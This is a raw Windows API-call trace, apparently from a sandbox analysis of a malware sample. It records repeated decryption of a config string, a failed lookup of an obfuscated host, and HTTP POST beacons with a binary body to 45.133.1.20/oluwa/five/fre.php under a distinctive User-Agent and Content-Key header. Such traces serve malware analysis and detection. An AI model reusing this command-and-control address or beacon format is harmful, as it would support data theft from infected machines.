GetProcessHeap () returned 0x6a0000 [0319.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0319.329] GetProcessHeap () returned 0x6a0000 [0319.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0319.329] GetProcessHeap () returned 0x6a0000 [0319.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0319.329] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19bc) returned 0xc54 [0319.331] Sleep (dwMilliseconds=0xea60) [0319.333] GetProcessHeap () returned 0x6a0000 [0319.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0319.334] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.334] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0319.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.346] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0319.358] GetProcessHeap () returned 0x6a0000 [0319.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b9998 [0319.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.360] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b9998, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0319.361] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.361] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0319.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.362] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0319.362] GetProcessHeap () returned 0x6a0000 [0319.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9998 | out: hHeap=0x6a0000) returned 1 [0319.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.367] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0319.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.369] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0319.374] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.375] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0319.375] GetProcessHeap () returned 0x6a0000 [0319.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0319.376] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.376] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0319.377] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.377] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0319.378] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.379] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0319.380] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.380] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0319.380] GetProcessHeap () returned 0x6a0000 [0319.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0319.381] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0319.381] GetProcessHeap () returned 0x6a0000 [0319.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0319.382] GetProcessHeap () returned 0x6a0000 [0319.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0319.382] GetProcessHeap () returned 0x6a0000 [0319.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0319.382] GetProcessHeap () returned 0x6a0000 [0319.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0319.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.384] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0319.393] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.394] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0319.403] GetProcessHeap () returned 0x6a0000 [0319.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0319.404] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.404] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0319.405] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.405] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0319.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.406] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0319.406] GetProcessHeap () returned 0x6a0000 [0319.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0319.410] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.411] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0319.411] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.412] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0319.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.413] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0319.413] GetProcessHeap () returned 0x6a0000 [0319.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0319.414] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.414] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0319.415] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.415] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0319.416] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.417] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0319.417] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.418] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0319.418] GetProcessHeap () returned 0x6a0000 [0319.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0319.418] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0319.418] GetProcessHeap () returned 0x6a0000 [0319.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0319.418] socket (af=2, type=1, protocol=6) returned 0xc58 [0319.419] connect (s=0xc58, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0319.441] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0319.443] GetProcessHeap () returned 0x6a0000 [0319.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0319.443] GetProcessHeap () returned 0x6a0000 [0319.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0319.444] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0319.445] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0319.445] GetProcessHeap () returned 0x6a0000 [0319.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df7a8 [0319.445] GetProcessHeap () returned 0x6a0000 [0319.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0319.446] GetProcessHeap () returned 0x6a0000 [0319.446] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0319.446] GetProcessHeap () returned 0x6a0000 [0319.446] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0319.447] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0319.447] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0319.449] GetProcessHeap () returned 0x6a0000 [0319.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0319.449] GetProcessHeap () returned 0x6a0000 [0319.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0319.450] send (s=0xc58, buf=0x6bd460*, len=242, flags=0) returned 242 [0319.451] send (s=0xc58, buf=0x6bb998*, len=159, flags=0) returned 159 [0319.451] GetProcessHeap () returned 0x6a0000 [0319.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0319.451] recv (in: s=0xc58, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0319.538] GetProcessHeap () returned 0x6a0000 [0319.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0319.539] GetProcessHeap () returned 0x6a0000 [0319.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0319.539] GetProcessHeap () returned 0x6a0000 [0319.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df7a8 | out: hHeap=0x6a0000) returned 1 [0319.540] GetProcessHeap () returned 0x6a0000 [0319.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0319.540] closesocket (s=0xc58) returned 0 [0319.541] GetProcessHeap () returned 0x6a0000 [0319.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0319.541] GetProcessHeap () returned 0x6a0000 [0319.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0319.542] GetProcessHeap () returned 0x6a0000 [0319.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0319.542] GetProcessHeap () returned 0x6a0000 [0319.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0319.543] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19c0) returned 0xc58 [0319.546] Sleep (dwMilliseconds=0xea60) [0319.548] GetProcessHeap () returned 0x6a0000 [0319.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0319.549] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.550] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0319.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.566] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0319.589] GetProcessHeap () returned 0x6a0000 [0319.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0319.594] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.595] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0319.596] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.597] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0319.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.598] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0319.598] GetProcessHeap () returned 0x6a0000 [0319.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0319.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.600] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0319.600] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.601] CryptDestroyKey (hKey=0x6ad020) returned 1 [0319.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.605] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0319.606] GetProcessHeap () returned 0x6a0000 [0319.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0319.607] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.607] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0319.609] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.609] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0319.610] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.611] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0319.612] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.612] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0319.612] GetProcessHeap () returned 0x6a0000 [0319.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0319.612] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0319.613] GetProcessHeap () returned 0x6a0000 [0319.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0319.613] GetProcessHeap () returned 0x6a0000 [0319.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0319.614] GetProcessHeap () returned 0x6a0000 [0319.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0319.615] GetProcessHeap () returned 0x6a0000 [0319.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0319.616] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.616] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0319.624] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.628] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0319.644] GetProcessHeap () returned 0x6a0000 [0319.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0319.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.645] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0319.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.655] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0319.656] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.657] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0319.657] GetProcessHeap () returned 0x6a0000 [0319.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0319.661] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.662] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0319.663] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.663] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0319.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.664] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0319.664] GetProcessHeap () returned 0x6a0000 [0319.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0319.665] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.666] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0319.667] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.668] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0319.671] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.672] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0319.673] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.673] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0319.673] GetProcessHeap () returned 0x6a0000 [0319.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0319.673] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0319.673] GetProcessHeap () returned 0x6a0000 [0319.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0319.673] socket (af=2, type=1, protocol=6) returned 0xc5c [0319.674] connect (s=0xc5c, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0319.703] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0319.703] GetProcessHeap () returned 0x6a0000 [0319.703] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0319.703] GetProcessHeap () returned 0x6a0000 [0319.703] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0319.704] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0319.705] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0319.705] GetProcessHeap () returned 0x6a0000 [0319.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dfb68 [0319.705] GetProcessHeap () returned 0x6a0000 [0319.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0319.706] GetProcessHeap () returned 0x6a0000 [0319.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0319.706] GetProcessHeap () returned 0x6a0000 [0319.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0319.707] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0319.707] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0319.708] GetProcessHeap () returned 0x6a0000 [0319.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0319.708] GetProcessHeap () returned 0x6a0000 [0319.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0319.708] send (s=0xc5c, buf=0x6bd460*, len=242, flags=0) returned 242 [0319.709] send (s=0xc5c, buf=0x6bb998*, len=159, flags=0) returned 159 [0319.709] GetProcessHeap () returned 0x6a0000 [0319.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0319.709] recv (in: s=0xc5c, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0319.790] GetProcessHeap () returned 0x6a0000 [0319.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0319.791] GetProcessHeap () returned 0x6a0000 [0319.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0319.791] GetProcessHeap () returned 0x6a0000 [0319.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dfb68 | out: hHeap=0x6a0000) returned 1 [0319.792] GetProcessHeap () returned 0x6a0000 [0319.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0319.792] closesocket (s=0xc5c) returned 0 [0319.794] GetProcessHeap () returned 0x6a0000 [0319.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0319.794] GetProcessHeap () returned 0x6a0000 [0319.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0319.795] GetProcessHeap () returned 0x6a0000 [0319.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0319.795] GetProcessHeap () returned 0x6a0000 [0319.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0319.796] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19c4) returned 0xc5c [0319.802] Sleep (dwMilliseconds=0xea60) [0319.804] GetProcessHeap () returned 0x6a0000 [0319.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 